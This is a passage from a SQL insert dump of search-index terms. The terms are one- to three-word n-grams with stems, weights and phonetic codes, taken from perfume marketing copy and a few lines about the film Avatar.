and',0,1,1.5333,'R1636253',1,'en'),(21795,'rose','rose',0,0,0.2667,'R200',1,'en'),(21796,'rose bush','rose bush',0,1,1.3,'R212',1,'en'),(21797,'rose bush jasmine','rose bush jasmine',0,1,1.5667,'R2125',1,'en'),(21798,'rose fact','rose fact',0,1,1.3,'R2123',1,'en'),(21799,'rose fact vanilla','rose fact vanilla',0,1,1.5667,'R2123154',1,'en'),(21800,'rose honey','rose honey',0,1,1.3333,'R250',1,'en'),(21801,'rose honey valuable','rose honey valuable',0,1,1.6333,'R251414',1,'en'),(21802,'rose marigold','rose marigold',0,1,1.4333,'R256243',1,'en'),(21803,'rose marigold cinnamon','rose marigold cinnamon',0,1,1.7333,'R25624325',1,'en'),(21804,'rosewood','rosewood',0,0,0.5333,'R230',1,'en'),(21805,'rosewood peppermint','rosewood peppermint',0,1,1.6333,'R231653',1,'en'),(21806,'rosewood peppermint gardenia','rosewood peppermint gardenia',0,1,1.9333,'R2316532635',1,'en'),(21807,'rum','rum',0,0,0.2,'R500',1,'en'),(21808,'rum essence','rum essence',0,1,1.3667,'R5252',1,'en'),(21809,'rum essence rose','rum essence rose',0,1,1.5333,'R525262',1,'en'),(21810,'sambac','sambac',0,0,0.4,'S512',1,'en'),(21811,'sambac jasmine','sambac jasmine',0,1,1.4667,'S5125',1,'en'),(21812,'sambac jasmine orange','sambac jasmine orange',0,1,1.7,'S5125652',1,'en'),(21813,'sandalwood','sandalwood',0,0,0.6667,'S5343',1,'en'),(21814,'sandalwood genuine','sandalwood genuine',0,1,1.6,'S534325',1,'en'),(21815,'sandalwood genuine tonka','sandalwood genuine tonka',0,1,1.8,'S534325352',1,'en'),(21816,'sandalwood vetiver','sandalwood vetiver',0,1,1.6,'S53431316',1,'en'),(21817,'sandalwood vetiver and','sandalwood vetiver and',0,1,1.7333,'S5343131653',1,'en'),(21818,'sasalwood','sasalwood',0,0,0.6,'S430',1,'en'),(21819,'sasalwood this','sasalwood this',0,1,1.4667,'S432',1,'en'),(21820,'sasalwood this fresh','sasalwood this fresh',0,1,1.6667,'S432162',1,'en'),(21821,'scent','scent',0,0,0.3333,'S530',1,'en'),(21822,'scent and','scent and',0,1,1.3,'S5353',1,'en'),(21823,'scent and you','scent and you',0,1,1.4333,'S5353',1,'en'),(21824,'scent brings','scent brings',0,1,1.4,'S531652',1,'en'),(21825,'scent brings out','scent brings out',0,1,1.5333,'S5316523',1,'en'),(21826,'scent has','scent has',0,1,1.3,'S532',1,'en'),(21827,'scent has notes','scent has notes',0,1,1.5,'S532532',1,'en'),(21828,'scent is','scent is',0,1,1.2667,'S532',1,'en'),(21829,'scent is contains','scent is contains',0,1,1.5667,'S5325352',1,'en'),(21830,'scent is worn','scent is worn',0,1,1.4333,'S53265',1,'en'),(21831,'scent lasts','scent lasts',0,1,1.3667,'S534232',1,'en'),(21832,'scent lasts all','scent lasts all',0,1,1.5,'S5342324',1,'en'),(21833,'scent nicely','scent nicely',0,1,1.4,'S53524',1,'en'),(21834,'scent nicely featuring','scent nicely featuring',0,1,1.7333,'S5352413652',1,'en'),(21835,'scent reflects','scent reflects',0,1,1.4667,'S53614232',1,'en'),(21836,'scent reflects the','scent reflects the',0,1,1.6,'S536142323',1,'en'),(21837,'scent that','scent that',0,1,1.3333,'S530',1,'en'),(21838,'scent that is','scent that is',0,1,1.4333,'S532',1,'en'),(21839,'scent was','scent was',0,1,1.3,'S532',1,'en'),(21840,'scent was created','scent was created',0,1,1.5667,'S53263',1,'en'),(21841,'scent.8.jimmy','scent.8.jimmi',0,0,0.8667,'S5325',1,'en'),(21842,'scent.8.jimmy choo','scent.8.jimmi choo',0,1,1.6,'S53252',1,'en'),(21843,'scent.8.jimmy choo jimmy','scent.8.jimmi choo jimmy',0,1,1.8,'S532525',1,'en'),(21844,'scented','scent',0,0,0.4667,'S530',1,'en'),(21845,'scented has','scent has',0,1,1.3667,'S532',1,'en'),(21846,'scented has notes','scent has notes',0,1,1.5667,'S532532',1,'en'),(21847,'sees','see',0,0,0.2667,'S000',1,'en'),(21848,'sees of','see of',0,1,1.2333,'S100',1,'en'),(21849,'sees of blood','see of blood',0,1,1.4333,'S143',1,'en'),(21850,'sells','sell',0,0,0.3333,'S420',1,'en'),(21851,'sells it','sell it',0,1,1.2667,'S423',1,'en'),(21852,'sells it again','sell it again',0,1,1.4667,'S42325',1,'en'),(21853,'sensual','sensual',0,0,0.4667,'S524',1,'en'),(21854,'sensual and','sensual and',0,1,1.3667,'S52453',1,'en'),(21855,'sensual and progressed','sensual and progressed',0,1,1.7333,'S52453162623',1,'en'),(21856,'sensual charm','sensual charm',0,1,1.4333,'S524265',1,'en'),(21857,'sensual charm and','sensual charm and',0,1,1.5667,'S5242653',1,'en'),(21858,'seringa','seringa',0,0,0.4667,'S652',1,'en'),(21859,'seringa bloom','seringa bloom',0,1,1.4333,'S652145',1,'en'),(21860,'seringa bloom rose','seringa bloom rose',0,1,1.6,'S65214562',1,'en'),(21861,'serious','seriou',0,0,0.4667,'S620',2,'en'),(21862,'serious perfume','seriou perfume',0,1,1.5,'S621615',1,'en'),(21863,'serious perfume that','seriou perfume that',0,1,1.6667,'S6216153',1,'en'),(21864,'serves','serv',0,0,0.4,'S612',2,'en'),(21865,'serves as','serv as',0,1,1.3,'S612',2,'en'),(21866,'serves as a','serv as a',0,1,1.3667,'S612',2,'en'),(21867,'service values','servic values',0,1,1.4667,'S612142',1,'en'),(21868,'service values of','servic values of',0,1,1.5667,'S6121421',1,'en'),(21869,'sexy','sexi',0,0,0.2667,'S000',1,'en'),(21870,'sexy perfume','sexi perfume',0,1,1.4,'S1615',1,'en'),(21871,'sexy perfume has','sexi perfume has',0,1,1.5333,'S16152',1,'en'),(21872,'sexy scent','sexi scent',0,1,1.3333,'S530',1,'en'),(21873,'sexy scent is','sexi scent is',0,1,1.4333,'S532',1,'en'),(21874,'shape','shape',0,0,0.3333,'S100',2,'en'),(21875,'shape 6.ralph','shape 6.ralph',0,1,1.4333,'S1641',1,'en'),(21876,'shape 6.ralph lauren','shape 6.ralph lauren',0,1,1.6667,'S1641465',1,'en'),(21877,'shoes','shoe',0,0,0.3333,'S000',3,'en'),(21878,'shoes this','shoe this',0,1,1.3333,'S320',1,'en'),(21879,'shoes this confident','shoe this confident',0,1,1.6667,'S3251353',1,'en'),(21880,'sorbet','sorbet',0,0,0.4,'S613',1,'en'),(21881,'sorbet sambac','sorbet sambac',0,1,1.4333,'S6132512',1,'en'),(21882,'sorbet sambac jasmine','sorbet sambac jasmine',0,1,1.7,'S61325125',1,'en'),(21883,'special','special',0,0,0.4667,'S124',4,'en'),(21884,'special occasion','special occasion',0,1,1.5333,'S12425',1,'en'),(21885,'special occasion 7.giorgio','special occasion 7.giorgio',0,1,1.8667,'S12425262',1,'en'),(21886,'spicey','spicei',0,0,0.4,'S120',1,'en'),(21887,'spicey chypre','spicei chypre',0,1,1.4333,'S1216',1,'en'),(21888,'spicey chypre notes','spicei chypre notes',0,1,1.6333,'S1216532',1,'en'),(21889,'spicy','spici',0,0,0.3333,'S120',1,'en'),(21890,'spicy perfume','spici perfume',0,1,1.4333,'S121615',1,'en'),(21891,'spicy perfume was','spici perfume was',0,1,1.5667,'S1216152',1,'en'),(21892,'spouse','spous',0,0,0.4,'S120',1,'en'),(21893,'spouse this','spous this',0,1,1.3667,'S1232',1,'en'),(21894,'spouse this classic','spous this classic',0,1,1.6333,'S123242',1,'en'),(21895,'story','stori',0,0,0.3333,'S360',1,'en'),(21896,'story in','stori in',0,1,1.2667,'S365',1,'en'),(21897,'story in a','stori in a',0,1,1.3333,'S365',1,'en'),(21898,'strengthening','strengthen',0,0,0.8667,'S3652352',1,'en'),(21899,'strengthening beautiful','strengthen beautiful',0,1,1.7667,'S36523521314',1,'en'),(21900,'strengthening beautiful and','strengthen beautiful and',0,1,1.9,'S3652352131453',1,'en'),(21901,'structure of','structur of',0,1,1.4,'S362361',1,'en'),(21902,'structure of this','structur of this',0,1,1.5667,'S36236132',1,'en'),(21903,'suits the','suit the',0,1,1.3,'S323',1,'en'),(21904,'suits the brand','suit the brand',0,1,1.5,'S3231653',1,'en'),(21905,'sungoddess','sungoddess',0,0,0.6667,'S5232',1,'en'),(21906,'sungoddess rose','sungoddess rose',0,1,1.5,'S523262',1,'en'),(21907,'sungoddess rose marigold','sungoddess rose marigold',0,1,1.8,'S52326256243',1,'en'),(21908,'sweet','sweet',0,0,0.3333,'S300',1,'en'),(21909,'sweet chinese','sweet chinese',0,1,1.4333,'S3252',1,'en'),(21910,'sweet chinese orange','sweet chinese orange',0,1,1.6667,'S3252652',1,'en'),(21911,'tamara','tamara',0,0,0.4,'T560',1,'en'),(21912,'tamara mellon','tamara mellon',0,1,1.4333,'T56545',1,'en'),(21913,'tamara mellon created','tamara mellon created',0,1,1.7,'T56545263',1,'en'),(21914,'teal','teal',0,0,0.2667,'T400',1,'en'),(21915,'teal freesia','teal freesia',0,1,1.4,'T4162',1,'en'),(21916,'teal freesia bright','teal freesia bright',0,1,1.6333,'T41621623',1,'en'),(21917,'temps','temp',0,0,0.3333,'T512',1,'en'),(21918,'temps is','temp is',0,1,1.2667,'T512',1,'en'),(21919,'temps is nina','temp is nina',0,1,1.4333,'T5125',1,'en'),(21920,'testified','testifi',0,0,0.6,'T2313',1,'en'),(21921,'testified how','testifi how',0,1,1.4333,'T2313',1,'en'),(21922,'testified how this','testifi how this',0,1,1.6,'T23132',1,'en'),(21923,'that hallmark','that hallmark',0,1,1.4333,'T4562',1,'en'),(21924,'that hallmark of','that hallmark of',0,1,1.5333,'T45621',1,'en'),(21925,'that has','that has',0,1,1.2667,'T200',3,'en'),(21926,'that has been','that has been',0,1,1.4333,'T215',2,'en'),(21927,'that is representative','that is representative',0,1,1.7333,'T26162531',1,'en'),(21928,'that is sensual','that is sensual',0,1,1.5,'T2524',1,'en'),(21929,'that many','that many',0,1,1.3,'T500',1,'en'),(21930,'that many ladies','that many ladies',0,1,1.5333,'T5432',1,'en'),(21931,'that represented','that represented',0,1,1.5333,'T616253',1,'en'),(21932,'that represented her','that represented her',0,1,1.6667,'T6162536',1,'en'),(21933,'the area','the area',0,1,1.2667,'T600',1,'en'),(21934,'the area sandalwood','the area sandalwood',0,1,1.6333,'T625343',1,'en'),(21935,'the bottle','the bottle',0,1,1.3333,'T134',1,'en'),(21936,'the bottle design','the bottle design',0,1,1.5667,'T134325',1,'en'),(21937,'the bottle for','the bottle for',0,1,1.4667,'T13416',1,'en'),(21938,'the brand','the brand',0,1,1.3,'T1653',1,'en'),(21939,'the brand founder','the brand founder',0,1,1.5667,'T16531536',1,'en'),(21940,'the brand many','the brand many',0,1,1.4667,'T16535',1,'en'),(21941,'the chemist','the chemist',0,1,1.3667,'T2523',1,'en'),(21942,'the chemist who','the chemist who',0,1,1.5,'T2523',1,'en'),(21943,'the effort','the effort',0,1,1.3333,'T163',1,'en'),(21944,'the effort of','the effort of',0,1,1.4333,'T1631',1,'en'),(21945,'the modern','the modern',0,1,1.3333,'T5365',2,'en'),(21946,'the modern woman','the modern woman',0,1,1.5333,'T5365',1,'en'),(21947,'the most famous','the most famous',0,1,1.5,'T523152',1,'en'),(21948,'the nina','the nina',0,1,1.2667,'T500',1,'en'),(21949,'the nina ricci','the nina ricci',0,1,1.4667,'T562',1,'en'),(21950,'the perfect','the perfect',0,1,1.3667,'T16123',1,'en'),(21951,'the perfect gift','the perfect gift',0,1,1.5333,'T16123213',1,'en'),(21952,'the product','the product',0,1,1.3667,'T16323',1,'en'),(21953,'the product or','the product or',0,1,1.4667,'T163236',1,'en'),(21954,'the scent','the scent',0,1,1.3,'T253',1,'en'),(21955,'the scent is','the scent is',0,1,1.4,'T2532',1,'en'),(21956,'the scent nicely','the scent nicely',0,1,1.5333,'T253524',1,'en'),(21957,'the scent reflects','the scent reflects',0,1,1.6,'T253614232',1,'en'),(21958,'the scent was','the scent was',0,1,1.4333,'T2532',1,'en'),(21959,'the structure','the structure',0,1,1.4333,'T236236',1,'en'),(21960,'the structure of','the structure of',0,1,1.5333,'T2362361',1,'en'),(21961,'the torso','the torso',0,1,1.3,'T620',1,'en'),(21962,'the torso package','the torso package',0,1,1.5667,'T6212',1,'en'),(21963,'the wearer.10.jean','the wearer.10.jean',0,1,1.6,'T625',1,'en'),(21964,'the wearer.10.jean robert','the wearer.10.jean robert',0,1,1.8333,'T6256163',1,'en'),(21965,'the world according','the world according',0,1,1.6333,'T64326352',1,'en'),(21966,'their spouse','their spouse',0,1,1.4,'T6212',1,'en'),(21967,'their spouse this','their spouse this',0,1,1.5667,'T621232',1,'en'),(21968,'this brand','thi brand',0,1,1.3333,'T21653',1,'en'),(21969,'this brand re','thi brand re',0,1,1.4333,'T216536',1,'en'),(21970,'this classic','thi classic',0,1,1.4,'T242',1,'en'),(21971,'this classic scent','thi classic scent',0,1,1.6,'T24253',1,'en'),(21972,'this confident','thi confident',0,1,1.4667,'T251353',1,'en'),(21973,'this confident and','thi confident and',0,1,1.6,'T25135353',1,'en'),(21974,'this enchantment','thi enchantment',0,1,1.5333,'T2525353',1,'en'),(21975,'this enchantment perfume','thi enchantment perfume',0,1,1.8,'T25253531615',1,'en'),(21976,'this excellent','thi excellent',0,1,1.4667,'T2453',1,'en'),(21977,'this excellent perfume','thi excellent perfume',0,1,1.7333,'T24531615',1,'en'),(21978,'this feminine','thi feminine',0,1,1.4333,'T215',1,'en'),(21979,'this feminine scent.8.jimmy','thi feminine scent.8.jimmy',0,1,1.9,'T21525325',1,'en'),(21980,'this floral','thi floral',0,1,1.3667,'T21464',1,'en'),(21981,'this floral and','thi floral and',0,1,1.5,'T2146453',1,'en'),(21982,'this fresh','thi fresh',0,1,1.3333,'T2162',1,'en'),(21983,'this fresh and','thi fresh and',0,1,1.4667,'T216253',1,'en'),(21984,'this is','thi is',0,1,1.2333,'T200',6,'en'),(21985,'this is also','thi is also',0,1,1.4,'T242',1,'en'),(21986,'this light','thi light',0,1,1.3333,'T2423',1,'en'),(21987,'this light and','thi light and',0,1,1.4667,'T242353',1,'en'),(21988,'this not','thi not',0,1,1.2667,'T253',1,'en'),(21989,'this not online','thi not online',0,1,1.5,'T253545',1,'en'),(21990,'this perfume','thi perfume',0,1,1.4,'T21615',1,'en'),(21991,'this perfume bottle','thi perfume bottle',0,1,1.6333,'T21615134',1,'en'),(21992,'this perfume has','thi perfume has',0,1,1.5333,'T216152',1,'en'),(21993,'this perfume is','thi perfume is',0,1,1.5,'T216152',1,'en'),(21994,'this perfume matches','thi perfume matches',0,1,1.6667,'T2161532',1,'en'),(21995,'this perfume this','thi perfume this',0,1,1.5667,'T2161532',1,'en'),(21996,'this perfume was','thi perfume was',0,1,1.5333,'T216152',1,'en'),(21997,'this scent','thi scent',0,1,1.3333,'T253',1,'en'),(21998,'this scent and','thi scent and',0,1,1.4667,'T25353',1,'en'),(21999,'this scented','thi scented',0,1,1.4,'T253',1,'en'),(22000,'this scented has','thi scented has',0,1,1.5333,'T2532',1,'en'),(22001,'this sexy','thi sexy',0,1,1.3,'T200',1,'en'),(22002,'this sexy perfume','thi sexy perfume',0,1,1.5667,'T21615',1,'en'),(22003,'tiger','tiger',0,0,0.3333,'T260',1,'en'),(22004,'tiger orchard','tiger orchard',0,1,1.4333,'T26263',1,'en'),(22005,'tiger orchard pear','tiger orchard pear',0,1,1.6,'T2626316',1,'en'),(22006,'timeless','timeless',0,0,0.5333,'T542',1,'en'),(22007,'timeless scent','timeless scent',0,1,1.4667,'T54253',1,'en'),(22008,'timeless scent brings','timeless scent brings',0,1,1.7,'T542531652',1,'en'),(22009,'to bring that','to bring that',0,1,1.4333,'T16523',1,'en'),(22010,'to get their','to get their',0,1,1.4,'T236',1,'en'),(22011,'to many','to many',0,1,1.2333,'T500',1,'en'),(22012,'to many and','to many and',0,1,1.3667,'T530',1,'en'),(22013,'to many women','to many women',0,1,1.4333,'T500',1,'en'),(22014,'to wear','to wear',0,1,1.2333,'T600',1,'en'),(22015,'to wear it\'s','to wear it',0,1,1.4,'T632',1,'en'),(22016,'toffee','toffe',0,0,0.4,'T100',1,'en'),(22017,'toffee indonesian','toffe indonesian',0,1,1.5667,'T153525',1,'en'),(22018,'toffee indonesian patchouli','toffe indonesian patchouli',0,1,1.9,'T1535251324',1,'en'),(22019,'tonka','tonka',0,0,0.3333,'T520',1,'en'),(22020,'tonka bean','tonka bean',0,1,1.3333,'T5215',1,'en'),(22021,'tonka bean and','tonka bean and',0,1,1.4667,'T52153',1,'en'),(22022,'too','too',1,0,0.025,'T000',3,'en'),(22023,'too serious','too serious',0,1,1.3667,'T262',1,'en'),(22024,'too serious perfume','too serious perfume',0,1,1.6333,'T2621615',1,'en'),(22025,'top','top',0,0,0.2,'T100',6,'en'),(22026,'top and','top and',0,1,1.2333,'T153',1,'en'),(22027,'top and feminine','top and feminine',0,1,1.5333,'T15315',1,'en'),(22028,'torso','torso',0,0,0.3333,'T620',1,'en'),(22029,'torso package','torso package',0,1,1.4333,'T6212',1,'en'),(22030,'uk robert','uk robert',0,1,1.3,'U26163',1,'en'),(22031,'uk robert ricci','uk robert ricci',0,1,1.5,'U2616362',1,'en'),(22032,'up here','up here',0,1,1.2333,'U160',1,'en'),(22033,'up here is','up here is',0,1,1.3333,'U162',1,'en'),(22034,'updates this','updat this',0,1,1.4,'U13232',1,'en'),(22035,'updates this perfume','updat this perfume',0,1,1.6667,'U132321615',1,'en'),(22036,'valuable woods','valuabl woods',0,1,1.4667,'V41432',1,'en'),(22037,'valuable woods complex','valuabl woods complex',0,1,1.7333,'V414325142',1,'en'),(22038,'values','valu',0,0,0.4,'V420',1,'en'),(22039,'values of','valu of',0,1,1.3,'V421',1,'en'),(22040,'values of peace','valu of peace',0,1,1.5,'V4212',1,'en'),(22041,'vanilla','vanilla',0,0,0.4667,'V540',1,'en'),(22042,'vanilla flavor','vanilla flavor',0,1,1.4667,'V541416',1,'en'),(22043,'vanilla flavor orchid','vanilla flavor orchid',0,1,1.7,'V54141623',1,'en'),(22044,'vanilla flavouring','vanilla flavouring',0,1,1.6,'V54141652',1,'en'),(22045,'vanilla flavouring and','vanilla flavouring and',0,1,1.7333,'V5414165253',1,'en'),(22046,'vanilla flavouring pleasant','vanilla flavouring pleasant',0,1,1.9,'V5414165214253',1,'en'),(22047,'venetian','venetian',0,0,0.5333,'V535',1,'en'),(22048,'venetian murano','venetian murano',0,1,1.5,'V53565',1,'en'),(22049,'venetian murano glass','venetian murano glass',0,1,1.7,'V53565242',1,'en'),(22050,'vetiver','vetiv',0,0,0.4667,'V316',1,'en'),(22051,'vetiver and','vetiv and',0,1,1.3667,'V31653',1,'en'),(22052,'vetiver and amber','vetiv and amber',0,1,1.5667,'V31653516',1,'en'),(22053,'vetiver in','vetiv in',0,1,1.3333,'V3165',1,'en'),(22054,'vetiver in addition','vetiv in addition',0,1,1.6333,'V316535',1,'en'),(22055,'violet','violet',0,0,0.4,'V430',1,'en'),(22056,'violet flower','violet flower',0,1,1.4333,'V43146',1,'en'),(22057,'violet flower petals','violet flower petals',0,1,1.6667,'V431461342',1,'en'),(22058,'violet leaving','violet leaving',0,1,1.4667,'V434152',1,'en'),(22059,'violet leaving dark','violet leaving dark',0,1,1.6333,'V434152362',1,'en'),(22060,'violet lotus','violet lotus',0,1,1.4,'V43432',1,'en'),(22061,'violet lotus wedding','violet lotus wedding',0,1,1.6667,'V43432352',1,'en'),(22062,'was created','wa created',0,1,1.3667,'W263',1,'en'),(22063,'was created by','wa created by',0,1,1.4667,'W2631',1,'en'),(22064,'was inspired','wa inspired',0,1,1.4,'W252163',1,'en'),(22065,'was inspired by','wa inspired by',0,1,1.5,'W2521631',1,'en'),(22066,'was jean','wa jean',0,1,1.2667,'W250',1,'en'),(22067,'was jean paul','wa jean paul',0,1,1.4333,'W2514',1,'en'),(22068,'was made','wa made',0,1,1.2667,'W253',1,'en'),(22069,'was made in','wa made in',0,1,1.3667,'W2535',1,'en'),(22070,'was the chemist','wa the chemist',0,1,1.5,'W232523',1,'en'),(22071,'wear','wear',0,0,0.2667,'W600',3,'en'),(22072,'wear it','wear it',0,1,1.2333,'W630',1,'en'),(22073,'wear it anywhere','wear it anywhere',0,1,1.5333,'W6356',1,'en'),(22074,'wear it\'s','wear it',0,1,1.3,'W632',1,'en'),(22075,'wear it\'s fantastic','wear it fantastic',0,1,1.6333,'W632153232',1,'en'),(22076,'wear this','wear this',0,1,1.3,'W632',1,'en'),(22077,'wear this scent','wear this scent',0,1,1.5,'W63253',1,'en'),(22078,'wearer.10.jean','wearer.10.jean',0,0,0.9333,'W625',1,'en'),(22079,'wearer.10.jean robert','wearer.10.jean robert',0,1,1.7,'W6256163',1,'en'),(22080,'wearer.10.jean robert gaultier','wearer.10.jean robert gaultier',0,1,2,'W62561632436',1,'en'),(22081,'wearing','wear',0,0,0.4667,'W652',3,'en'),(22082,'wearing this','wear this',0,1,1.4,'W65232',1,'en'),(22083,'wearing this feminine','wear this feminine',0,1,1.7,'W6523215',1,'en'),(22084,'wedding','wed',0,0,0.4667,'W352',2,'en'),(22085,'wedding plants','wed plants',0,1,1.4667,'W35214532',1,'en'),(22086,'wedding plants day','wed plants day',0,1,1.6,'W352145323',1,'en'),(22087,'when wearing','when wearing',0,1,1.4,'W5652',1,'en'),(22088,'when wearing this','when wearing this',0,1,1.5667,'W565232',1,'en'),(22089,'when worn','when worn',0,1,1.3,'W565',1,'en'),(22090,'when worn the','when worn the',0,1,1.4333,'W5653',1,'en'),(22091,'white','white',0,0,0.3333,'W300',3,'en'),(22092,'white woods','white woods',0,1,1.3667,'W320',1,'en'),(22093,'white woods the','white woods the',0,1,1.5,'W323',1,'en'),(22094,'who created','who created',0,1,1.3667,'W263',1,'en'),(22095,'who created this','who created this',0,1,1.5333,'W2632',1,'en'),(22096,'who live','who live',0,1,1.2667,'W410',1,'en'),(22097,'who live testified','who live testified',0,1,1.6,'W4132313',1,'en'),(22098,'who wear','who wear',0,1,1.2667,'W600',1,'en'),(22099,'who wear it','who wear it',0,1,1.3667,'W630',1,'en'),(22100,'wholesomeness','wholesom',0,0,0.8667,'W4252',1,'en'),(22101,'wholesomeness autonomy','wholesom autonomy',0,1,1.7333,'W425235',1,'en'),(22102,'wholesomeness autonomy and','wholesom autonomy and',0,1,1.8667,'W4252353',1,'en'),(22103,'woman','woman',0,0,0.3333,'W500',2,'en'),(22104,'woman floral','woman floral',0,1,1.4,'W51464',1,'en'),(22105,'woman floral oriental','woman floral oriental',0,1,1.7,'W514646534',1,'en'),(22106,'woman it','woman it',0,1,1.2667,'W530',1,'en'),(22107,'woman it has','woman it has',0,1,1.4,'W532',1,'en'),(22108,'women','women',0,0,0.3333,'W500',5,'en'),(22109,'women and','women and',0,1,1.3,'W530',1,'en'),(22110,'women and men','women and men',0,1,1.4333,'W535',1,'en'),(22111,'women in','women in',0,1,1.2667,'W500',2,'en'),(22112,'women in every','women in every',0,1,1.4667,'W516',1,'en'),(22113,'women love','women love',0,1,1.3333,'W541',1,'en'),(22114,'women love to','women love to',0,1,1.4333,'W5413',1,'en'),(22115,'women who','women who',0,1,1.3,'W500',1,'en'),(22116,'women who live','women who live',0,1,1.4667,'W541',1,'en'),(22117,'women who wear','women who wear',0,1,1.4667,'W560',1,'en'),(22118,'women worldwide','women worldwide',0,1,1.5,'W5643',1,'en'),(22119,'women worldwide 9.l\'air','women worldwide 9.l',0,1,1.7667,'W564346',1,'en'),(22120,'wonderful','wonder',0,0,0.6,'W53614',4,'en'),(22121,'wonderful accessory','wonder accessory',0,1,1.6333,'W5361426',1,'en'),(22122,'wonderful accessory women','wonder accessory women',0,1,1.8333,'W53614265',1,'en'),(22123,'woods','wood',0,0,0.3333,'W320',1,'en'),(22124,'woods complex','wood complex',0,1,1.4333,'W325142',1,'en'),(22125,'woods complex and','wood complex and',0,1,1.5667,'W32514253',1,'en'),(22126,'woods the','wood the',0,1,1.3,'W323',1,'en'),(22127,'woods the bottle','wood the bottle',0,1,1.5333,'W323134',1,'en'),(22128,'world according','world according',0,1,1.5,'W64326352',1,'en'),(22129,'world according to','world according to',0,1,1.6,'W643263523',1,'en'),(22130,'worldwide','worldwid',0,0,0.6,'W643',2,'en'),(22131,'worldwide 9.l\'air','worldwid 9.l',0,1,1.5667,'W64346',1,'en'),(22132,'worldwide 9.l\'air du','worldwid 9.l du',0,1,1.6667,'W643463',1,'en'),(22133,'worn','worn',0,0,0.2667,'W650',1,'en'),(22134,'worn by','worn by',0,1,1.2333,'W651',1,'en'),(22135,'worn by a','worn by a',0,1,1.3,'W651',1,'en'),(22136,'worn by many','worn by many',0,1,1.4,'W6515',1,'en'),(22137,'worn the','worn the',0,1,1.2667,'W653',1,'en'),(22138,'worn the scent','worn the scent',0,1,1.4667,'W653253',1,'en'),(22139,'year in','year in',0,1,1.2333,'Y650',2,'en'),(22140,'year in year','year in year',0,1,1.4,'Y656',1,'en'),(22141,'year out','year out',0,1,1.2667,'Y630',1,'en'),(22142,'year out this','year out this',0,1,1.4333,'Y632',1,'en'),(22143,'year this','year this',0,1,1.3,'Y632',1,'en'),(22144,'year this not','year this not',0,1,1.4333,'Y63253',1,'en'),(22145,'ylang','ylang',0,0,0.3333,'Y452',1,'en'),(22146,'ylang rose','ylang rose',0,1,1.3333,'Y45262',1,'en'),(22147,'ylang rose bush','ylang rose bush',0,1,1.5,'Y4526212',1,'en'),(22148,'ylang ylang','ylang ylang',0,1,1.3667,'Y452452',1,'en'),(22149,'ylang ylang rose','ylang ylang rose',0,1,1.5333,'Y45245262',1,'en'),(22150,'you get','you get',0,1,1.2333,'Y230',5,'en'),(22151,'you get many','you get many',0,1,1.4,'Y235',1,'en'),(22152,'youthful','youth',0,0,0.5333,'Y314',2,'en'),(22153,'youthful and','youth and',0,1,1.4,'Y31453',1,'en'),(22154,'youthful and not','youth and not',0,1,1.5333,'Y3145353',1,'en'),(22155,'\'avatar\'','avatar',0,0,0.5333,'A136',1,'en'),(22156,'\'avatar\' the','avatar the',0,1,1.4,'A1363',1,'en'),(22157,'\'avatar\' the movie','avatar the movie',0,1,1.6,'A136351',1,'en'),(22158,'1.light','1.light',0,0,0.4667,'L230',1,'en'),(22159,'1.light yellow','1.light yellow',0,1,1.4667,'L234',1,'en'),(22160,'1.light yellow skinned','1.light yellow skinned',0,1,1.7333,'L234253',1,'en'),(22161,'1.rare','1.rare',0,0,0.4,'R000',1,'en'),(22162,'1.rare skinned','1.rare skinned',0,1,1.4667,'R253',1,'en'),(22163,'1.rare skinned aliens','1.rare skinned aliens',0,1,1.7,'R253452',1,'en'),(22164,'135','135',0,0,0.3,'',1,'en'),(22165,'2.it','2.it',0,0,0.2667,'I300',1,'en'),(22166,'2.it most','2.it most',0,1,1.3,'I3523',1,'en'),(22167,'2.it most current','2.it most current',0,1,1.5667,'I35232653',1,'en'),(22168,'2.it most up-to-date','2.it most up-to-date',0,1,1.6667,'I352313',1,'en'),(22169,'2d','2d',0,0,0.1333,'D000',1,'en'),(22170,'2d 3d','2d 3d',0,1,1.1667,'D000',1,'en'),(22171,'2d 3d or','2d 3d or',0,1,1.2667,'D600',1,'en'),(22172,'3.see','3.see',0,0,0.3333,'S000',1,'en'),(22173,'3.see the','3.see the',0,1,1.3,'S300',1,'en'),(22174,'3.see the film','3.see the film',0,1,1.4667,'S3145',1,'en'),(22175,'3.you','3.you',0,0,0.3333,'Y000',1,'en'),(22176,'3.you understand','3.you understand',0,1,1.5333,'Y5362353',1,'en'),(22177,'3.you understand the','3.you understand the',0,1,1.6667,'Y5362353',1,'en'),(22178,'300','300',0,0,0.3,'',1,'en'),(22179,'300 million','300 million',0,1,1.3667,'M450',1,'en'),(22180,'300 million to','300 million to',0,1,1.4667,'M453',1,'en'),(22181,'3d','3d',0,0,0.1333,'D000',1,'en'),(22182,'3d area','3d area',0,1,1.2333,'D600',1,'en'),(22183,'3d area theatres','3d area theatres',0,1,1.5333,'D6362',1,'en'),(22184,'3d character','3d character',0,1,1.4,'D26236',1,'en'),(22185,'3d character is','3d character is',0,1,1.5,'D262362',1,'en'),(22186,'3d include','3d include',0,1,1.3333,'D5243',1,'en'),(22187,'3d include national','3d include national',0,1,1.6333,'D52435354',1,'en'),(22188,'3d now','3d now',0,1,1.2,'D500',1,'en'),(22189,'3d now twice','3d now twice',0,1,1.4,'D532',1,'en'),(22190,'3d or','3d or',0,1,1.1667,'D600',1,'en'),(22191,'3d or perhaps','3d or perhaps',0,1,1.4333,'D61612',1,'en'),(22192,'3d theater','3d theater',0,1,1.3333,'D600',1,'en'),(22193,'3d theater at','3d theater at',0,1,1.4333,'D630',1,'en'),(22194,'4.if','4.if',0,0,0.2667,'I100',1,'en'),(22195,'4.if desire','4.if desire',0,1,1.3667,'I1326',1,'en'),(22196,'4.if desire to','4.if desire to',0,1,1.4667,'I13263',1,'en'),(22197,'4.if your','4.if your',0,1,1.3,'I160',1,'en'),(22198,'4.if your goal','4.if your goal',0,1,1.4667,'I1624',1,'en'),(22199,'5.a','5.a',0,0,0.2,'A000',1,'en'),(22200,'5.a lot','5.a lot',0,1,1.2333,'A430',1,'en'),(22201,'5.a lot of','5.a lot of',0,1,1.3333,'A431',1,'en'),(22202,'5.many','5.mani',0,0,0.4,'M000',1,'en'),(22203,'5.many people','5.mani people',0,1,1.4333,'M140',1,'en'),(22204,'5.many people like','5.mani people like',0,1,1.6,'M142',1,'en'),(22205,'a decade','a decade',0,1,1.2667,'A323',1,'en'),(22206,'a decade symkus','a decade symkus',0,1,1.5,'A323252',1,'en'),(22207,'a new','a new',0,1,1.1667,'A500',4,'en'),(22208,'a new life','a new life',0,1,1.3333,'A541',1,'en'),(22209,'a paraplegic','a paraplegic',0,1,1.4,'A16142',1,'en'),(22210,'a 